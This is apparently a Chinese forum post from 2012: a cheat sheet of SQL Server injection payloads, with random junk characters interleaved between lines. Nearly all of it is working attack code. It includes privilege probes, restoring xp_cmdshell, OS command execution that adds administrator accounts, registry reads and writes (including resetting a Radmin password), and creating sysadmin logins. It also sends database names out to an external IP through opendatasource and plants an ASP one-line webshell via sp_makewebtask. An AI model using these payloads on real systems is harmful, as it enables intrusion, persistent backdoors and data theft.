//看看是什么权限的
& M. p e1 O# l2 J, b, Q0 [and 1=(Select IS_MEMBER('db_owner'))! I7 |1 K7 L6 B2 ~
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--$ n4 A5 B' O3 [+ O! t/ K
$ O* ]. E. c s9 p! x: ]+ c. k//检测是否有读取某数据库的权限8 n0 Z# B9 g/ u0 H$ u
and 1= (Select HAS_DBACCESS('master'))
3 e0 H+ [, i9 v( [& ~2 }And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
k# j+ y, r7 `# B6 y3 A) O' e. p
% b( T5 u$ X8 _: }
, M' F$ T4 U6 b0 m8 L! Q数字类型
' t$ ~1 C! E5 {1 E) C& Eand char(124)%2Buser%2Bchar(124)=0
4 z% O! l; B* V/ { h0 F5 p/ Q0 q8 x& C, U6 J$ z9 I
字符类型
; R/ l; v/ C$ G4 [2 d* W' and char(124)%2Buser%2Bchar(124)=0 and ''='# y0 Q, }; H q, l- L
: v) _# T* H; u9 t' ~2 j" g
搜索类型5 M, v6 a* f4 x: K9 t
' and char(124)%2Buser%2Bchar(124)=0 and '%'='% l; r0 ~9 B3 ?! ?
; ^$ d$ n; o0 Q! X8 D
爆用户名8 s- E; d5 `8 F, _1 G# J7 Y
and user>0
, B2 E \4 J. t+ O' and user>0 and ''='# u' s$ z/ {9 K, m( g+ [
5 g& n5 q; p7 i0 J0 n
检测是否为SA权限
/ c# A- \0 i! s# f% t! [, Aand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
2 y& J" `9 w, l0 m0 [And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --/ q/ Y6 \ j- [9 ~
+ u* o9 F( s& B3 N3 j
检测是不是MSSQL数据库$ X" Q& ?% X. V2 {7 x' p
and exists (select * from sysobjects);--0 K+ W1 L% ~/ X
3 d# V* U3 y: M! D检测是否支持多行7 j% E/ X! [4 @' Q" E
;declare @d int;--5 Q3 R( x& r$ V2 _
O+ B- \6 Z+ G$ d) z恢复 xp_cmdshell
: X& d( ^, S2 C4 ];exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
1 {& e; ?: ?' M9 w$ ^
. {6 r }0 A, S1 P( n* e- L! }- r4 E. F0 I* f" Y9 ^4 ?8 H
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
! p1 [+ q+ R" S) H7 C4 n/ d& {# T1 n, C- \+ L3 j% S
//-----------------------0 F: v$ d: t4 A3 u
// 执行命令 d2 Z3 M" O$ D9 V7 `
//-----------------------
+ q `1 }' G4 k8 _- x2 \( N' @! l首先开启沙盘模式:
& |+ h, @' ]$ W* `2 Y( C- }exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; ]+ ?; v4 d; a- r# @$ U- o1 a5 A
2 \. ^/ Q% r1 B然后利用jet.oledb执行系统命令' f4 ?6 U; y" Z+ P6 e
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
: c) F6 G1 l' d. z6 ^. d, p' @7 y9 ?) i
执行命令
# X0 x/ F4 Y- I. B) i% n" Z6 z2 |;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--: c1 V3 Q3 O- z- v' y
; ?& p8 u6 R& z9 e4 lEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'9 S; F( { D; N+ M
3 f# W5 {0 j& Q
判断xp_cmdshell扩展存储过程是否存在:- L, {4 n) }! A5 w2 a! I
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
- e# z- m+ @- F
, q9 w- A5 c) N- j* j1 N& F' ~写注册表. _1 O$ L* P; `- f
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; Q0 ` a' _$ J+ s" M
: v; g+ l4 K ]+ F7 V
REG_SZ. S% A; y+ R7 X) z" Z
4 r' F2 Z' ^% Z
读注册表
" I4 }8 ]& k; Hexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
& O. v3 x' `+ ^% O0 c: z, }
8 {# \. _8 c8 w/ I; A+ l读取目录内容
; b6 d& P8 k$ {$ Lexec master..xp_dirtree 'c:\winnt\system32\',1,1
6 _: A; ^- l0 H6 q6 C8 `. T$ X6 W7 }- _+ B) X9 N6 D* z
8 M) [" I: }( d5 a4 V
数据库备份6 y) l4 R6 Z- J- G! ~- G
backup database pubs to disk = 'c:\123.bak'( C" x8 p" ?6 T% b X& F
0 F& q/ `2 }4 n% M
//爆出长度% ~4 X( N( I; ~. Y) H4 R
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--9 A( L+ t( W" ?
8 u6 N' ]& h' O! e: n
8 n" x( v7 A$ q" L* d2 l! J' H5 S( e5 l% ]6 p4 q5 d
更改sa口令方法:用sql综合利用工具连接后,执行命令:
8 ]$ Z7 u( c& {6 Gexec sp_password NULL,'新密码','sa'
! A6 `( I) ~% s& H7 w0 v$ Q" _) h
添加和删除一个SA权限的用户test:' U& b5 r) f' B" R8 v' c( p6 n' E
exec master.dbo.sp_addlogin test,9530772
/ ?& S' O& v) j/ texec master.dbo.sp_addsrvrolemember test,sysadmin1 l; j! {9 O" K9 N
: e1 e' N: R1 h: t; E删除扩展存储过过程xp_cmdshell的语句:
" w( ?" ?! o( y/ {3 q8 U) a7 dexec sp_dropextendedproc 'xp_cmdshell'
6 x# ~$ ^ D7 ?1 G! z A }8 x$ ]0 H( D' Q+ k
添加扩展存储过过程
, W4 G) k: V+ A7 n2 K- jEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'1 R% r: H3 K5 N; z- }, G
GRANT exec On xp_proxiedadata TO public% f7 K) t2 u9 z- A
1 W! V* t7 ^3 x' \% f( A
# U6 u& [8 J, x! l: g/ e% m k: F
停掉或激活某个服务。
1 m2 K& m4 e6 A7 t) M2 Y+ A: i# k3 u$ _+ {) l! c( r
exec master..xp_servicecontrol 'stop','schedule'
' b: G. Q1 ~* {3 t/ X& Eexec master..xp_servicecontrol 'start','schedule'
6 ?2 R( l9 ^# A' l& ]; X, ^
0 [/ L' R; J; C5 K) bdbo.xp_subdirs4 ?) C6 n; n" I' ~; u, s
# g/ _2 h3 b3 | o: M y
只列某个目录下的子目录。
( A8 N: C5 m" i: q9 A# wxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
9 }1 k. A/ N% g" b7 Z# @/ z3 _! ~+ M, Y0 K
dbo.xp_makecab
5 j3 U' j% T* E$ S% J+ U8 T: v' `* k! X; F8 ? M
将目标多个档案压缩到某个目标档案之内。
3 P/ Q8 u6 y" F) r( Z2 Z所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。" p& }9 I/ d0 ~0 g d' @
) R f8 Y8 K. A4 U( z
dbo.xp_makecab. V0 ?: c3 O4 b/ {) o; u
'c:\test.cab','mszip',1,% z# ~) D) T0 g. ?3 m; k
'C:\Inetpub\wwwroot\SQLInject\login.asp',
: |9 \) P# h/ R |: s'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'6 W2 u9 d4 w5 _% p" {: n( w: ], ]- f
) f$ R! m7 }& ]) ~7 l% i3 H
xp_terminate_process `' e; I+ P0 [1 s, E; a
. y8 C- m% N, D( J7 V+ E) u
停掉某个执行中的程序,但赋予的参数是 Process ID。
# m; }! I5 K h( D. q利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
0 B: \) C5 i$ s; m
! }, e0 D j9 k3 N$ f* e! F# T# uxp_terminate_process 24849 [$ b4 r) X) y7 N
. H# Y# P6 I3 d2 q6 b8 T* X# v: l
xp_unpackcab
; i& h6 E- V4 Q: q ?* ^$ E7 X1 ]! L* I! a# ~
解开压缩档。
$ P0 A* t) c& h
0 W2 {; J7 G0 exp_unpackcab 'c:\test.cab','c:\temp',12 M( \0 @" G1 w$ s. Z2 a% l
3 Y+ A( c4 R$ V# O
% ^4 [# [! W% [2 u
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12347 c* N7 c7 E3 i+ S9 |1 i
0 p- ~! @- _! B8 i- Z
create database lcx;
" J5 {, E- }6 _+ C5 g0 xCreate TABLE ku(name nvarchar(256) null);
) ^2 }7 i! @4 G1 ], lCreate TABLE biao(id int NULL,name nvarchar(256) null);
/ g8 ^+ \6 s( i: p' J' M
5 r7 k# R' x+ H ~//得到数据库名; O7 N& L/ a/ _
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
4 |3 D3 o2 ?9 V- e, S4 d3 H; B' a
9 v7 O2 ^1 K7 _2 R- t
//在Master中创建表,看看权限怎样6 m+ L9 w( I3 N) `+ V' R7 |, k6 T
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
' y! p; F* K6 _6 { M- }9 D$ B' z* M5 `2 e: y8 p
用 sp_makewebtask直接在web目录里写入一句话马:
) ^+ J% s5 i6 ?; Z( ?3 q! ~! jhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
3 B2 n W2 @' P4 D! W9 G0 K7 ? d% s! t c3 I4 ^) f) b2 E
//更新表内容
- M% ?3 ~' y+ |$ `! D" M* j6 H8 QUpdate films SET kind = 'Dramatic' Where id = 123
9 P% B: n/ U% D( y8 E1 [- y
- }4 F7 W: z$ M" `" w+ z8 {6 }//删除内容* O$ g3 u0 M! R" x# a: R3 d$ ^
delete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对